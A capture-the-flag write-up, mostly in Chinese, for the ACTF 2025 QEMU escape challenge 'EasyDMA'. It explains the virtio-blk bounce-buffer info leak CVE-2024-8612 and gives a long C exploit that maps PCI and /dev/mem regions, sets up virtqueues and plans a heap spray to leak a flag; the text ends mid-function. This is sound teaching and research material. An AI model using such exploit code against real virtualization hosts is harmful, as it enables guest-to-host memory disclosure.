QEMU PWN - EasyDMA

EasyDMA

From: ACTF 2025

题目给出一个去符号的 qemu 二进制文件 qemu-system-x86_64,启动参数如下

#!/bin/sh
timeout --foreground 300 ./qemu-system-x86_64 \
    -L pc-bios \
    -m 1024 \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -drive file=null-co://,if=none,id=mydisk \
    -device virtio-blk-pci,drive=mydisk,ioeventfd=off \
    -device readflag \
    -append "priority=low console=ttyS0" \
    -monitor /dev/null \
    -nographic

添加两个设备 virtio-blk-pci, readflag

反汇编可以找到 readflag 通过 mmio 的读、写回调函数:

__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
  __int64 result; // rax

  if ( addr > 0x7F )
  {
    result = -1LL;
    if ( size != 4 )
      return result;
  }
  else if ( size != 4 )
  {
    result = -1LL;
    if ( size != 8 )
      return result;
  }
  result = 0xDEADBEEFLL;
  if ( addr )
  {
    if ( addr == 8 )
      return *(_QWORD *)(opaque + 2984);
    else
      return -1LL;
  }
  return result;
}
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
  void *v4; // rbp
  FILE *v5; // rax
  FILE *v6; // r12
  size_t v7; // rax
  int v8; // [rsp+0h] [rbp-20h]

  if ( addr > 0x7F )
  {
    if ( size != 4 )
      return;
  }
  else if ( size != 4 )
  {
    if ( size == 8 && addr == 8 )
      goto LABEL_6;
    return;
  }
  if ( addr )
  {
    if ( addr == 8 )
LABEL_6:
      *(_QWORD *)(opaque + 2984) = val;
  }
  else if ( val <= 0xFFF )
  {
    v8 = val;
    v4 = malloc(val);
    if ( v4 )
    {
      v5 = fopen64("flag", "r");
      v6 = v5;
      if ( v5 )
      {
        v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
        if ( v7 )
          *((_BYTE *)v4 + v7) = 0;
        else
          puts("No data read from the file.");
        free(v4);
        fclose(v6);
      }
      else
      {
        perror("Error opening file");
        free(v4);
      }
    }
    else
    {
      perror("Memory allocation failed");
    }
  }
}

Virtio Block Device1

Data types definition

For the integer data types used in the structure definitions, the following conventions are used:

  • u8, u16, u32, u64

    An unsigned integer of the specified length in bits.

  • le16, le32, le64

    An unsigned integer of the specified length in bits, in little-endian byte order.

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

PCI Capabilities

struct virtio_pci_cap {
    u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
    u8 cap_next; /* Generic PCI field: next ptr. */
    u8 cap_len; /* Generic PCI field: capability length */
    u8 cfg_type; /* Identifies the structure. */
    u8 bar; /* Where to find it. */
    u8 id; /* Multiple capabilities of the same type */
    u8 padding[2/* Pad to full dword. */
    le32 offset; /* Offset within bar. */
    le32 length; /* Length of the structure, in bytes. */

cfg_type identifies the structure, according to the following table:

/* Common configuration */
#define VIRTIO_PCI_CAP_COMMON_CFG 1
/* Notifications */
#define VIRTIO_PCI_CAP_NOTIFY_CFG 2
/* ISR Status */
#define VIRTIO_PCI_CAP_ISR_CFG 3
/* Device specific configuration */
#define VIRTIO_PCI_CAP_DEVICE_CFG 4
/* PCI configuration access */
#define VIRTIO_PCI_CAP_PCI_CFG 5
/* Shared memory region */
#define VIRTIO_PCI_CAP_SHARED_MEMORY_CFG 8
/* Vendor-specific data */
#define VIRTIO_PCI_CAP_VENDOR_CFG 9

For common configuration, its layout is below:

struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select; /* read-write */
    le32 device_feature; /* read-only for driver */
    le32 driver_feature_select; /* read-write */
    le32 driver_feature; /* read-write */
    le16 config_msix_vector; /* read-write */
    le16 num_queues; /* read-only for driver */
    u8 device_status; /* read-write */
    u8 config_generation; /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select; /* read-write */
    le16 queue_size; /* read-write */
    le16 queue_msix_vector; /* read-write */
    le16 queue_enable; /* read-write */
    le16 queue_notify_off; /* read-only for driver */
    le64 queue_desc; /* read-write */
    le64 queue_driver; /* read-write */
    le64 queue_device; /* read-write */
    le16 queue_notif_config_data; /* read-only for driver */
    le16 queue_reset; /* read-write */
    /* About the administration virtqueue. */
    le16 admin_queue_index; /* read-only for driver */
    le16 admin_queue_num; /* read-only for driver */

For notification, its layout is below:

struct virtio_pci_notify_cap {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */

We recognize these type, and record the offset.

void print_cap(struct virtio_pci_cap* cap){
    printf("cap_len: %x\n", cap->cap_len);
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:
            printf("cfg_type: common\n");
            break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:
            printf("cfg_type: notify\n");
            break;
        case VIRTIO_PCI_CAP_ISR_CFG:
            printf("cfg_type: isr\n");
            break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:
            printf("cfg_type: device\n");
            break;
        case VIRTIO_PCI_CAP_PCI_CFG:
            printf("cfg_type: pci\n");
            break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY:
            printf("cfg_type: shared memory\n");
            break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:
            printf("cfg_type: vendor\n");
            break;
        default:
            printf("cfg_type: unknown\n");
            break;
    }
    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }

Virtqueue2

The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.

Each virtqueue can consist of up to 3 parts:

​ • Descriptor Area - used for describing buffers

​ • Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.

​ • Device Area - extra data supplied by device to driver. Also called used virtqueue.

Shared memory with split ring elements

There areas structure defined below:

struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};

struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;

    /*
    * The number of bytes written into the device writable portion of
    * the buffer described by the descriptor chain.
    */
    le32 len;
};

struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

The driver queues requests to the virtqueue, the type of the request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write zeroes (VIRTIO_BLK_T_WRITE_ZEROES) or a flush (VIRTIO_BLK_T_FLUSH).

struct virtio_blk_req { 
        le32 type; 
        le32 reserved; 
        le64 sector; 
        u8 data[][512]; 
        u8 status; 
}; 
 
struct virtio_blk_discard_write_zeroes { 
       le64 sector; 
       le32 num_sectors; 
       struct { 
               le32 unmap:1; 
               le32 reserved:31; 
       } flags; 
};

#define VIRTIO_BLK_T_IN           0 
#define VIRTIO_BLK_T_OUT          1 
#define VIRTIO_BLK_T_FLUSH        4 
#define VIRTIO_BLK_T_DISCARD      11 
#define VIRTIO_BLK_T_WRITE_ZEROES 13

MMIO3

Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.

uint8_t mmio_read8(void* addr){
    return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
    return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
    return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
    return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
    *(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
    *(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
    *(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
    *(volatile uint64_t*)addr = val;
}

Device configuration layout

struct virtio_blk_config {
        le64 capacity;
        le32 size_max;
        le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
    struct virtio_blk_zoned_characteristics {
        le32 zone_sectors;
        le32 max_open_zones;
        le32 max_active_zones;
        le32 max_append_sectors;
        le32 write_granularity;
        u8 model;
        u8 unused2[3];
    } zoned;
};

Initialization

  1. Read capabilities
  2. Reset device
  3. Reset Virtqueue
void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    close(fd);
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset device
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


    // alloc dma memory
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // init queue
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);

    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}

Vulnerabilities

CVE-2024-8612

从文件的字符串中可得知 qemu 的版本号为 qemu-8.0.0-rc2,存在一个关于 virtio-blk-pci 的信息泄漏漏洞: CVE-2024-8612

具体利用还可以参考:

HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei,

ACTF2025-EasyDMA Writeup

当 DMA 访问的地址是 MMIO 的,会使用 bounce buffer

/* Map a physical memory region into a host virtual address.
 * May map a subset of the requested range, given by and returned in *plen.
 * May return NULL if resources needed to perform the mapping are exhausted.
 * Use only for reads OR writes - not for read-modify-write operations.
 * Use cpu_register_map_client() to know when retrying the map operation is
 * likely to succeed.
 */
void *address_space_map(AddressSpace *as,
                        hwaddr addr,
                        hwaddr *plen,
                        bool is_write,
                        MemTxAttrs attrs)
{
    hwaddr len = *plen;
    hwaddr l, xlat;
    MemoryRegion *mr;
    FlatView *fv;

    if (len == 0) {
        return NULL;
    }

    l = len;
    RCU_READ_LOCK_GUARD();
    fv = address_space_to_flatview(as);
    mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);

    if (!memory_access_is_direct(mr, is_write)) {
        if (qatomic_xchg(&bounce.in_use, true)) {
            *plen = 0;
            return NULL;
        }
               /* Avoid unbounded allocations */
        l = MIN(l, TARGET_PAGE_SIZE);
        bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
        bounce.addr = addr;
        bounce.len = l;

        memory_region_ref(mr);
        bounce.mr = mr;
        if (!is_write) {
            flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
                               bounce.buffer, l);
        }

        *plen = l;
        return bounce.buffer;
    }
	//...
}

同时,通过 qemu_memalign 得到的内存并没有初始化。

static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
    uint32_t type;
    struct iovec *in_iov = req->elem.in_sg;
    struct iovec *out_iov = req->elem.out_sg;
    unsigned in_num = req->elem.in_num;
    unsigned out_num = req->elem.out_num;
    VirtIOBlock *s = req->dev;
    VirtIODevice *vdev = VIRTIO_DEVICE(s);
    
    if (req->elem.out_num < 1 || req->elem.in_num < 1) {
        virtio_error(vdev, "virtio-blk missing headers");
        return -1;
    }

    if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
                            sizeof(req->out)) != sizeof(req->out))) {
        virtio_error(vdev, "virtio-blk request outhdr too short");
        return -1;
    }

    iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
                               &req->outhdr_undo);

    if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
        virtio_error(vdev, "virtio-blk request inhdr too short");
        iov_discard_undo(&req->outhdr_undo);
        return -1;
    }
    
    //...
    
    req->in_len = iov_size(in_iov, in_num);
    
    //...
    
    case VIRTIO_BLK_T_IN:
    {
        bool is_write = type & VIRTIO_BLK_T_OUT;
        req->sector_num = virtio_ldq_p(vdev, &req->out.sector);

        if (is_write) {
            qemu_iovec_init_external(&req->qiov, out_iov, out_num);
            trace_virtio_blk_handle_write(vdev, req, req->sector_num,
                                          req->qiov.size / BDRV_SECTOR_SIZE);
        } else {
            qemu_iovec_init_external(&req->qiov, in_iov, in_num);
            trace_virtio_blk_handle_read(vdev, req, req->sector_num,
                                         req->qiov.size / BDRV_SECTOR_SIZE);
        }

        if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
            virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
            block_acct_invalid(blk_get_stats(s->blk),
                               is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
            virtio_blk_free_request(req);
            return 0;
        }
        
	//...

    default:
    virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
    virtio_blk_free_request(req);
        
}

virtio_blk_handle_request,即使请求不合法,长度也被写入到 req->in_lentype 不合法时,直接调用 virtio_blk_req_complete

调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write

MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
                                MemTxAttrs attrs,
                                const void *buf, int len)
{
    MemTxResult result;
    __bufread(buf, len);
    return result;
}

由于缺乏保护,数据可以被写到 Common configuration 部分,并且部分空间可被读出。

Exploit

通过堆喷,将 flag 字符串填充在内存中。利用上述漏洞读出内存内容。

#include<stddef.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<assert.h>
#include<stdint.h>
#include<sys/io.h>
#include<linux/stddef.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

struct virtio_pci_cap {
    u8 cap_vndr;
    u8 cap_next;
    u8 cap_len;
    u8 cfg_type;
    u8 bar;
    u8 id;
    u8 padding[2];
    le32 offset;
    le32 length;
};

struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select; /* read-write */
    le32 device_feature; /* read-only for driver */
    le32 driver_feature_select; /* read-write */
    le32 driver_feature; /* read-write */
    le16 config_msix_vector; /* read-write */
    le16 num_queues; /* read-only for driver */
    u8 device_status; /* read-write */
    u8 config_generation; /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select; /* read-write */
    le16 queue_size; /* read-write */
    le16 queue_msix_vector; /* read-write */
    le16 queue_enable; /* read-write */
    le16 queue_notify_off; /* read-only for driver */
    le64 queue_desc; /* read-write */
    le64 queue_driver; /* read-write */
    le64 queue_device; /* read-write */
    le16 queue_notify_data; /* read-only for driver */
    le16 queue_reset; /* read-write */
};

struct virtio_notify_cfg {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier;
};

struct virtio_blk_config{
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
};

enum virtio_pci_cfg_type{
    VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
    VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
    VIRTIO_PCI_CAP_ISR_CFG = 0x3,
    VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
    VIRTIO_PCI_CAP_PCI_CFG = 0x5,
    VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
    VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};

/* Feature bits */
#define VIRTIO_BLK_F_SIZE_MAX	1	/* Indicates maximum segment size */
#define VIRTIO_BLK_F_SEG_MAX	2	/* Indicates maximum # of segments */
#define VIRTIO_BLK_F_GEOMETRY	4	/* Legacy geometry available  */
#define VIRTIO_BLK_F_RO		5	/* Disk is read-only */
#define VIRTIO_BLK_F_BLK_SIZE	6	/* Block size of disk is available*/
#define VIRTIO_BLK_F_FLUSH	9	/* Flush command supported */
#define VIRTIO_BLK_F_TOPOLOGY	10	/* Topology information is available */
#define VIRTIO_BLK_F_MQ		12	/* support more than one vq */
#define VIRTIO_BLK_F_DISCARD	13	/* DISCARD is supported */
#define VIRTIO_BLK_F_WRITE_ZEROES	14	/* WRITE ZEROES is supported */
#define VIRTIO_BLK_F_SECURE_ERASE	16 /* Secure Erase is supported */

/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE	1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER		2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK	4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK	8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET	0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED		0x80

#define VIRTIO_QUEUE_SIZE 0x10

struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};

struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;

    /*
    * The number of bytes written into the device writable portion of
    * the buffer described by the descriptor chain.
    */
    le32 len;
};

struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtio_blk_req {
    le32 type;
    le32 reserved;
    le64 sector;
    u8 data[0];
    // u8 status;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_GET_ID 8
#define VIRTIO_BLK_T_GET_LIFETIME 10
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13
#define VIRTIO_BLK_T_SECURE_ERASE 14


void print_cap(struct virtio_pci_cap* cap){
    printf("cap_len: %x\n", cap->cap_len);
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:
            printf("cfg_type: common\n");
            break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:
            printf("cfg_type: notify\n");
            break;
        case VIRTIO_PCI_CAP_ISR_CFG:
            printf("cfg_type: isr\n");
            break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:
            printf("cfg_type: device\n");
            break;
        case VIRTIO_PCI_CAP_PCI_CFG:
            printf("cfg_type: pci\n");
            break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY:
            printf("cfg_type: shared memory\n");
            break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:
            printf("cfg_type: vendor\n");
            break;
        default:
            printf("cfg_type: unknown\n");
            break;
    }
    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

void ERR(const char* buf){
    perror(buf);
    abort();
}

void LOG(const char* buf){
    write(2, buf, strlen(buf));
}

volatile char* readflag_mmio = NULL;
volatile char* virtio_mmio = NULL;
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;

void init_readflag(){
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if(mmio_fd < 0){
        ERR("Open readflag");
    }
    readflag_mmio = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(readflag_mmio == (volatile void*)-1){
        ERR("mmap mmio_mem");
    }
    close(mmio_fd);

    puts("readflag init done");
}

uint8_t mmio_read8(void* addr){
    return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
    return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
    return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
    return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
    *(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
    *(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
    *(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
    *(volatile uint64_t*)addr = val;
}

void mb(){
    asm volatile("mfence":::"memory");
}

void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    close(fd);
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
